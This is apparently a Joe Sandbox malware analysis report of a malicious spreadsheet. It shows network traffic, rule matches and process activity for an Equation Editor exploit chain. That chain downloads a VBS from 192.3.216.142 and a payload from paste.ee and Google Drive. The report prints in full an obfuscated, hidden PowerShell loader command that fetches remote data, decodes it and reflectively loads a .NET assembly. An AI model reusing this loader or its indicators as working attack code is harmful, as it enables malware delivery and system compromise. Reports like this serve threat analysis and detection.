    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 216.58.212.174:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443
    Source: global trafficTCP traffic: 216.58.212.129:443 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.58.212.129:443

    Networking

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
    Source: unknownDNS query: name: paste.ee
    Source: unknownDNS query: name: paste.ee
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp HTTP/1.1Host: drive.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /download?id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 192.3.216.142 192.3.216.142
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: global trafficHTTP traffic detected: GET /d/KXy1F HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
    Source: global trafficHTTP traffic detected: GET /WEDNESDAY-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.216.142Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /d/KXy1F HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49164 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49165 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.142
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660588 URLDownloadToFileW,2_2_03660588
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\WEDNESDAY-constraints[1].vbsJump to behavior
    Source: global trafficHTTP traffic detected: GET /d/KXy1F HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp HTTP/1.1Host: drive.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /download?id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /WEDNESDAY-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.216.142Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /d/KXy1F HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: paste.ee
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: EQNEDT32.EXE, 00000002.00000002.471678397.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.142/WEDNESDAY-constraints.vbs
    Source: EQNEDT32.EXE, 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.142/WEDNESDAY-constraints.vbsj
    Source: EQNEDT32.EXE, 00000002.00000002.471678397.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.142/WEDNESDAY-constraints.vbszzC:
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 00000008.00000002.490093448.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
    Source: powershell.exe, 00000008.00000002.490093448.00000000028FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: wscript.exe, 00000005.00000003.481716993.000000000045D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.481855459.000000000045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/KXy1F
    Source: wscript.exe, 00000005.00000003.480458856.0000000002DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/KXy1FS
    Source: powershell.exe, 00000006.00000002.491806655.000000000218F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
    Source: powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000008.00000002.490093448.0000000003060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
    Source: powershell.exe, 00000008.00000002.489882057.00000000004C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.489882057.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.489859803.0000000000360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
    Source: powershell.exe, 00000008.00000002.490093448.0000000003060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
    Source: powershell.exe, 00000008.00000002.490093448.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp
    Source: powershell.exe, 00000008.00000002.490093448.0000000003060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHpt
    Source: powershell.exe, 00000008.00000002.490093448.000000000308B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
    Source: powershell.exe, 00000008.00000002.490093448.000000000308B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.490093448.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp&export=download
    Source: powershell.exe, 00000008.00000002.490093448.000000000308B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googleX
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
    Source: powershell.exe, 00000008.00000002.490773902.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/KXy1F
    Source: wscript.exe, 00000005.00000003.479987355.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.482455380.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.491096274.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
    Source: wscript.exe, 00000005.00000002.482455380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.479987355.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

    System Summary

    barindex
    Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 3932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYm